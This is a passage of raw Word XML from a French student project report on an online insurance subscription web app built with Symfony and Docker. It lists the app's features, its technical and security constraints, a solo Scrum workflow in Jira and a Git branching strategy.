          <w:p w14:paraId="5118797B" w14:textId="73428F14" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="00281897">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Création d'une demande de souscription</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F951AE" w14:textId="576492DD" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="00281897">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Dépôt des documents justificatifs (permis, carte grise)</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21BF4C91" w14:textId="381B56E4" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="00281897">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Espace compte utilisateur (consultation de l'historique)</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E90DAC" w14:textId="0BE144C5" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="0073449E">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Génération d'attestation PDF (souscription validée)</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01BE65C4" w14:textId="7E819439" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="0073449E">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Gestion admin des souscriptions (statuts, documents)</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0052C15C" w14:textId="70978BFC" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="0073449E">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Gestion admin de la liste des utilisateurs inscrits</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3784" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01D09FE6" w14:textId="0867D916" w:rsidR="002A5F4C" w:rsidRDefault="00281897" w:rsidP="0073449E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Paiement en ligne</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (v2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B92EAE1" w14:textId="1A44B9D8" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="00281897">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Gestion des sinistres après souscription</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E498966" w14:textId="289899CD" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="0073449E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Application mobile native</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3628D40A" w14:textId="52761906" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="0073449E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Notifications par e-mail</w:t>
            </w:r>
            <w:r w:rsidR="00262F18">
              <w:t xml:space="preserve"> (v2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="575B5022" w14:textId="5F672330" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="0073449E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Modification du profil utilisateur</w:t>
            </w:r>
            <w:r w:rsidR="00262F18">
              <w:t xml:space="preserve"> (v2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="651E13A6" w14:textId="392F61A3" w:rsidR="003A6B7F" w:rsidRDefault="00281897" w:rsidP="0073449E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Tableaux de bord statistiques</w:t>
            </w:r>
            <w:r w:rsidR="00262F18">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57A7D2DF" w14:textId="0E95ACA6" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00925D7A">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:before="480" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc233817729"/>
      <w:r>
        <w:t>2.5 Contraintes identifiées</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="090F90C4" w14:textId="77777777" w:rsidR="00925D7A" w:rsidRDefault="003239D4" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00925D7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Contraintes techniques :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C518DCD" w14:textId="3B8C9E03" w:rsidR="003A6B7F" w:rsidRDefault="00925D7A" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:t xml:space="preserve">éveloppement sous Docker (PHP 8.2-fpm-alpine, Nginx, MySQL 8.0) avec le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003239D4">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003239D4">
        <w:t xml:space="preserve"> Symfony 7.4 et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003239D4">
        <w:t>AssetMapper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003239D4">
        <w:t xml:space="preserve"> pour la gestion des assets </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003239D4">
        <w:t>front-end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003239D4">
        <w:t xml:space="preserve">, sans </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003239D4">
        <w:t>bundler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003239D4">
        <w:t xml:space="preserve"> externe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45949D00" w14:textId="77777777" w:rsidR="00925D7A" w:rsidRDefault="003239D4" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00925D7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Contrainte de temps :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB9D4AE" w14:textId="021491F1" w:rsidR="003A6B7F" w:rsidRDefault="00925D7A" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:t>rojet réalisé seul, en parallèle de la formation, avec une organisation en sprints de 1 à 2 semaines et un suivi des tâches via Jira.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C02E1F" w14:textId="77777777" w:rsidR="00925D7A" w:rsidRDefault="003239D4" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00925D7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Contraintes de sécurité et RGPD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00925D7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5720DD91" w14:textId="397E5152" w:rsidR="003A6B7F" w:rsidRDefault="00925D7A" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:t>rotection des données personnelles (prénom, nom, e-mail) et des documents justificatifs (permis de conduire, carte grise) contre les accès non autorisés, les injections SQL et les attaques XSS et CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916ABC4" w14:textId="77777777" w:rsidR="00925D7A" w:rsidRDefault="003239D4" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:before="480" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00925D7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Contrainte d'accessibilité :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0F305" w14:textId="281BF7D4" w:rsidR="003A6B7F" w:rsidRDefault="00925D7A" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:t>pplication utilisable depuis tout navigateur web récent, sur desktop et mobile, sans installation requise.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD7DD83" w14:textId="2BCD6419" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="3659A423" w14:textId="5F48DF18" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc233817730"/>
      <w:r>
        <w:t>3. ORGANISATION DU TRAVAIL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="53DAB65D" w14:textId="595B921C" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc233817731"/>
      <w:r>
        <w:t>3.1 Méthode de gestion de projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="0892FA5C" w14:textId="29011A95" w:rsidR="003A6B7F" w:rsidRDefault="0085640C" w:rsidP="0085640C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc233817732"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B20CB70" wp14:editId="7479E5FA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4129405</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>1308100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1564005" cy="1327150"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="199325470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4703" name="Image 19932547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4005" cy="1327150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Une organisation inspirée de Scrum</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="099B5678" w14:textId="0213B825" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E83FF4">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le projet a été mené seul, mais organisé selon les principes de la méthode Scrum adaptée au travail individuel. Le développement a été découpé en sprints courts </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>de une</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> à deux semaines, chacun ciblant un ensemble précis de fonctionnalités à livrer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2750F22B" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="6767146A" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="0085640C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc233817733"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>backlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>tâches géré</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans Jira</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="78871A92" w14:textId="308D49B5" w:rsidR="003A6B7F" w:rsidRDefault="00123F9F" w:rsidP="00123F9F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00123F9F">
        <w:t xml:space="preserve">Les fonctionnalités à développer ont été découpées en user stories dans Jira (projet « PP »), formant le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00123F9F">
        <w:t>backlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00123F9F">
        <w:t xml:space="preserve"> du projet. Chaque ticket, identifié par un numéro allant de pp-5 à pp-20, décrit une fonctionnalité attendue du point de vue utilisateur, avec ses critères d'acceptation. Ce découpage a permis de prioriser les développements et de maintenir une vision claire de l'avancement tout au long du projet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7FF0B5" w14:textId="77777777" w:rsidR="00FB7EEC" w:rsidRDefault="00553A67" w:rsidP="00FB7EEC">
      <w:pPr>
        <w:spacing w:before="480" w:after="360" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33A5D917" wp14:editId="7B81F94B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-8468</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>265853</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5739977" cy="2042551"/>
                <wp:effectExtent l="0" t="0" r="13335" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="1033658247" name="Rectangle 17"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5739977" cy="204255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74AE3" id="Rectangle 17" o:spid="_x0000_s1026" style="position:absolute;margin-left:-.65pt;margin-top:20.95pt;width:451.95pt;height:16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" filled="f" strokecolor="black [3213]" strokeweight=".5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B72E1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F779F92" wp14:editId="4AA66041">
            <wp:extent cx="5731510" cy="1993900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="186609174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91740" name="Image 18660917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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="116CB506" w14:textId="3C5A47C4" w:rsidR="00943247" w:rsidRPr="00B72E1F" w:rsidRDefault="00943247" w:rsidP="00FB7EEC">
      <w:pPr>
        <w:spacing w:after="600" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B72E1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fig.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B72E1F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B72E1F" w:rsidRPr="00B72E1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tableau </w:t>
      </w:r>
      <w:r w:rsidR="000E1DB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="00B72E1F" w:rsidRPr="00B72E1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ira de sprint 4 (espace admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C14D7C" w14:textId="0D77746A" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00123F9F">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:before="600" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc233817734"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Suivi de l'avancement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="7738B960" w14:textId="24957416" w:rsidR="003A6B7F" w:rsidRDefault="00123F9F" w:rsidP="00123F9F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00123F9F">
        <w:t xml:space="preserve">Le projet ayant été mené en solo, j'ai endossé l'ensemble des rôles Scrum cumulativement. En tant que Product Owner, j'ai rédigé et priorisé les user stories dans le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00123F9F">
        <w:t>backlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00123F9F">
        <w:t xml:space="preserve"> Jira. En tant que Scrum Master, j'ai défini le périmètre de chaque sprint et veillé au respect du cadre méthodologique. En tant que développeur, j'ai implémenté les fonctionnalités ticket par ticket. Enfin, j'ai également assuré le rôle de relecteur (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00123F9F">
        <w:t>reviewer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00123F9F">
        <w:t xml:space="preserve">) : avant de clore chaque ticket, je relisais le code produit, vérifiait les critères d'acceptation et validais </w:t>
      </w:r>
      <w:r w:rsidRPr="00123F9F">
        <w:lastRenderedPageBreak/>
        <w:t>manuellement le comportement attendu dans le navigateur. Cet exercice, bien qu'inhabituel en solo, m'a permis de pratiquer concrètement l'ensemble du cycle de vie Scrum et de maintenir une discipline de livraison itérative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C868B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:keepNext/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc233817735"/>
      <w:r>
        <w:t>3.2 Versionnage du code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="05326747" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="000E1DB2">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc233817736"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Git et gestion des branches</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1D55A911" w14:textId="77777777" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00C1520D">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00102517">
        <w:t>Afin d'assurer un suivi rigoureux des évolutions du projet et de faciliter le travail collaboratif, le code source est géré à l'aide du système de gestion de versions Git. Cet outil permet de conserver un historique complet des modifications apportées au projet, de revenir à une version antérieure si nécessaire et de travailler simultanément sur plusieurs fonctionnalités sans risque de conflit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43A95E" w14:textId="77777777" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00F86F99">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="240" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00102517">
        <w:t>Le développement s'appuie sur une branche principale nommée dev, qui regroupe l'ensemble des fonctionnalités en cours de développement. Cette branche constitue l'environnement d'intégration où sont rassemblées les différentes évolutions avant leur validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C58432" w14:textId="445071A9" w:rsidR="00102517" w:rsidRPr="00102517" w:rsidRDefault="00102517" w:rsidP="00F86F99">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:before="120" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00102517">
        <w:t>Pour chaque ticket créé dans Jira, une branche spécifique est générée à partir de la branche dev. Cette branche porte généralement le numéro du ticket correspondant (par exemple pp-17 ou pp-20). Cette organisation permet d'isoler le développement de chaque fonctionnalité ou correction de bug, limitant ainsi les risques d'impacter le travail réalisé sur les autres parties du projet. Une fois les développements terminés, les tests effectués et la fonctionnalité validée, la branche est fusionnée avec la branche dev.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5393C0AA" w14:textId="5D2543AC" w:rsidR="00FB7EEC" w:rsidRDefault="00FB7EEC" w:rsidP="00FB7EEC">
      <w:pPr>
        <w:spacing w:before="360" w:after="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66C7E61B" wp14:editId="22788379">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>140335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5694680" cy="2360930"/>
                <wp:effectExtent l="0" t="0" r="20320" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="520531183" name="Rectangle 17"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5694680" cy="23609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07E4D" id="Rectangle 17" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:11.05pt;width:448.4pt;height:185.9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" filled="f" strokecolor="black [3213]" strokeweight=".5pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
